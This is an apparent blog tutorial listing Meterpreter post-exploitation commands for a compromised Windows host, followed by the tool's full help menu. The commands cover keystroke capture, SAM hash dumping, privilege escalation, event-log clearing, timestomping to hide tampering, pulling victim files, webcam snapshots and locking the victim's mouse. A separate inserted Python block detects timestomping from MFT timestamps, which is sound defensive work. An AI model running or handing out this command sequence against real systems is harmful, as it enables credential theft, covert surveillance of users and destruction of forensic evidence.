After you successfully compromise a Windows host with Metasploit, you get a Meterpreter shell. Today I will walk through what you can do with Meterpreter once you have that shell.
[*] Meterpreter session 1 opened ( ->
sessions -l shows the machines you currently control
- Id Description Tunnel
- 4 meterpreter x86/win32 server-PC\Administrator @ SERVER-PC -> (
meterpreter > sessions -i 4
meterpreter > sysinfo
meterpreter > background
meterpreter > ps
meterpreter > keyscan_start
keyscan_dump // view the captured keystrokes
meterpreter > migrate
First use the ps command to list the processes and get the process ID, then run migrate (process ID)
meterpreter > ipconfig
meterpreter > getuid
meterpreter > shell
meterpreter > idletime
meterpreter > hashdump
meterpreter > getsystem
meterpreter > clearev
meterpreter > execute (a Windows command)
- meterpreter > execute
- Usage: execute -f file [options]
- Executes a command on the remote machine.
- -H Create the process hidden from view.
- -a <opt> The arguments to pass to the command.
- -c Channelized I/O (required for interaction).
- -d <opt> The 'dummy' executable to launch when using -m.
- -f <opt> The executable command to run.
- -h Help menu.
- -i Interact with the process after creating it.
- -k Execute process on the meterpreters current desktop
- -m Execute from memory.
- -s <opt> Execute process in a given session as the session user
- -t Execute process with currently impersonated thread token
meterpreter > timestomp
meterpreter > timestomp c:\\ -c "09/09/1980 12:12:34" // change the file's creation time
meterpreter > timestomp c:\\ -m "01/01/1991 12:12:34" // change the file's modification time
meterpreter > timestomp c:\\ -f c:\\ // copy the file attributes onto the jzking121 file
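For responders, the timestomp usage above leaves recognisable traces in NTFS metadata. The following is an added example, not part of the original post, that flags two common heuristics over parsed MFT records; the record layout, field names, paths and timestamps are constructed for illustration.

```python
from datetime import datetime

# Constructed sample, shaped like MFT-parser output: each file carries
# $STANDARD_INFORMATION (si_*) and $FILE_NAME (fn_*) timestamps.
SAMPLE_RECORDS = [
    {"path": r"C:\Users\Public\report.docx",            # untouched file
     "si_created": "2023-04-11T08:15:42.318417",
     "si_modified": "2023-04-12T10:01:07.551220",
     "fn_created": "2023-04-11T08:15:42.318417"},
    {"path": r"C:\Users\Public\svc_update.exe",         # creation time set back
     "si_created": "1980-09-09T12:12:34.000000",
     "si_modified": "2023-04-11T09:30:12.104533",
     "fn_created": "2023-04-11T09:30:12.104533"},
    {"path": r"C:\Users\Public\notes.txt",              # modification time set back
     "si_created": "2023-04-11T09:31:00.772901",
     "si_modified": "1991-01-01T12:12:34.000000",
     "fn_created": "2023-04-11T09:31:00.772901"},
]

def timestomp_indicators(record):
    """Return the heuristic indicators that fire for one file record."""
    found = []
    si_created = datetime.fromisoformat(record["si_created"])
    fn_created = datetime.fromisoformat(record["fn_created"])
    # User-mode APIs rewrite $STANDARD_INFORMATION only; $FILE_NAME keeps the
    # original value, so an SI creation time older than FN is inconsistent.
    if si_created < fn_created:
        found.append("si_created_before_fn_created")
    # A time typed as "MM/DD/YYYY HH:MM:SS" has no sub-second part, whereas
    # NTFS normally records 100 ns resolution. Archive tools can also cause
    # this, so treat it as a lead rather than proof.
    for field in ("si_created", "si_modified"):
        if datetime.fromisoformat(record[field]).microsecond == 0:
            found.append("zero_subsecond:" + field)
    return found

def scan(records):
    """Map path -> indicators for every record with at least one hit."""
    hits = {}
    for record in records:
        indicators = timestomp_indicators(record)
        if indicators:
            hits[record["path"]] = indicators
    return hits

if __name__ == "__main__":
    for path, indicators in scan(SAMPLE_RECORDS).items():
        print(path, "->", ", ".join(indicators))
```

Both heuristics produce leads for triage, not verdicts; confirm a hit against other evidence such as the USN journal or $LogFile before concluding a file was tampered with.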
meterpreter > download (file path)
meterpreter > download c:\\
[*] downloading: c:\ ->
[*] downloaded : c:\ ->
meterpreter > shutdown
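meterpreter > screenshot
meterpreter > uictl enable keyboard // allow the target to use the keyboard
meterpreter > uictl disable mouse // prevent the target from using the mouse
enable turns the device on
disable turns the device off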
meterpreter > webcam_list
meterpreter > webcam_snap
meterpreter > search -d c:\\ -f
- meterpreter > help
- Core Commands
- =============
- Command Description
- ------- -----------
- ? Help menu
- background Backgrounds the current session
- bgkill Kills a background meterpreter script
- bglist Lists running background scripts
- bgrun Executes a meterpreter script as a background thread
- channel Displays information about active channels
- close Closes a channel
- disable_unicode_encoding Disables encoding of unicode strings
- enable_unicode_encoding Enables encoding of unicode strings
- exit Terminate the meterpreter session
- help Help menu
- info Displays information about a Post module
- interact Interacts with a channel
- irb Drop into irb scripting mode
- load Load one or more meterpreter extensions
- migrate Migrate the server to another process
- quit Terminate the meterpreter session
- read Reads data from a channel
- resource Run the commands stored in a file
- run Executes a meterpreter script or Post module
- use Deprecated alias for 'load'
- write Writes data to a channel
- Stdapi: File system Commands
- ============================
- Command Description
- ------- -----------
- cat Read the contents of a file to the screen
- cd Change directory
- download Download a file or directory
- edit Edit a file
- getlwd Print local working directory
- getwd Print working directory
- lcd Change local working directory
- lpwd Print local working directory
- ls List files
- mkdir Make directory
- pwd Print working directory
- rm Delete the specified file
- rmdir Remove directory
- search Search for files
- upload Upload a file or directory
- Stdapi: Networking Commands
- ===========================
- Command Description
- ------- -----------
- ifconfig Display interfaces
- ipconfig Display interfaces
- portfwd Forward a local port to a remote service
- route View and modify the routing table
- Stdapi: System Commands
- =======================
- Command Description
- ------- -----------
- clearev Clear the event log
- drop_token Relinquishes any active impersonation token.
- execute Execute a command
- getpid Get the current process identifier
- getprivs Attempt to enable all privileges available to the current process
- getuid Get the user that the server is running as
- kill Terminate a process
- ps List running processes
- reboot Reboots the remote computer
- reg Modify and interact with the remote registry
- rev2self Calls RevertToSelf() on the remote machine
- shell Drop into a system command shell
- shutdown Shuts down the remote computer
- steal_token Attempts to steal an impersonation token from the target process
- sysinfo Gets information about the remote system, such as OS
- Stdapi: User interface Commands
- ===============================
- Command Description
- ------- -----------
- enumdesktops List all accessible desktops and window stations
- getdesktop Get the current meterpreter desktop
- idletime Returns the number of seconds the remote user has been idle
- keyscan_dump Dump the keystroke buffer
- keyscan_start Start capturing keystrokes
- keyscan_stop Stop capturing keystrokes
- screenshot Grab a screenshot of the interactive desktop
- setdesktop Change the meterpreters current desktop
- uictl Control some of the user interface components
- Stdapi: Webcam Commands
- =======================
- Command Description
- ------- -----------
- webcam_list List webcams
- webcam_snap Take a snapshot from the specified webcam
- Priv: Elevate Commands
- ======================
- Command Description
- ------- -----------
- getsystem Attempt to elevate your privilege to that of local system.
- Priv: Password database Commands
- ================================
- Command Description
- ------- -----------
- hashdump Dumps the contents of the SAM database
- Priv: Timestomp Commands
- ========================
- Command Description
- ------- -----------
- timestomp Manipulate file MACE attributes